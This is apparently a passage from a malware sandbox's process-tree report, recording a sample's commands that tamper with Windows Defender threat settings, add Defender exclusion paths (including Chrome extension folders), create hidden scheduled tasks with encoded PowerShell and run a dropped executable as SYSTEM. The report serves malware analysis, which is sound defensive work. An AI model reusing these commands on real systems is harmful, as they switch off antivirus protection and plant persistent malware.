                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:988
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                      4⤵
                                                                        PID:2468
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                          5⤵
                                                                            PID:2672
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              6⤵
                                                                                PID:2500
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                            4⤵
                                                                              PID:2496
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:2624
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:2588
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                    PID:2656
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                        PID:1028
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          6⤵
                                                                                            PID:2484
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        4⤵
                                                                                          PID:2848
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            5⤵
                                                                                              PID:2312
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2724
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  7⤵
                                                                                                    PID:1640
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gxTLGHSnv" /SC once /ST 05:25:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2980
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gxTLGHSnv"
                                                                                            3⤵
                                                                                              PID:2316
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gxTLGHSnv"
                                                                                              3⤵
                                                                                                PID:2144
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                3⤵
                                                                                                  PID:2412
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                    4⤵
                                                                                                      PID:2296
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2460
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2624
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:1568
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2352
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:2092
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1712
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:1640
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                            4⤵
                                                                                                              PID:476
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1432
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:1792
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\BghGRzxT\ZNRQFmcCfPZLBDRk.wsf"
                                                                                                                3⤵
                                                                                                                  PID:1008
                                                                                                                • C:\Windows\SysWOW64\wscript.exe
                                                                                                                  wscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\BghGRzxT\ZNRQFmcCfPZLBDRk.wsf"
                                                                                                                  3⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2668
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:1468
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2528
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2976
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2988
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:1748
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2144
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2468
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2628
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2460
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2296
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:3064
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:1668
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2376
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:1912
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2924
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:2360
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:3012
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                    • Windows security bypass
                                                                                                                    PID:1472
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                      PID:3036
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                        PID:2848
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                        4⤵
                                                                                                                          PID:580
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                          4⤵
                                                                                                                            PID:1608
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                            4⤵
                                                                                                                              PID:2636
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                              4⤵
                                                                                                                                PID:1856
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                4⤵
                                                                                                                                  PID:2164
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  4⤵
                                                                                                                                    PID:896
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:1756
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      4⤵
                                                                                                                                        PID:1776
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        4⤵
                                                                                                                                          PID:1812
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                          4⤵
                                                                                                                                            PID:1632
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            4⤵
                                                                                                                                              PID:2244
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              4⤵
                                                                                                                                                PID:2600
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                4⤵
                                                                                                                                                  PID:1008
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1468
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2528
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1480
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 09:50:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\XbtEaun.exe\" 7d /BirodidhV 525403 /S" /V1 /F
                                                                                                                                                      3⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:1720
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "WFVPvOFzrjCnPPlbL"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2144
                                                                                                                                                    • C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\XbtEaun.exe
                                                                                                                                                      C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\XbtEaun.exe 7d /BirodidhV 525403 /S
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2500
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1800
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:612
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1996
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:2592
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:980
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:1372
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:2296
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1816
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:272
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:3032
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1032
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:944
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2648
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2188
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:776
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
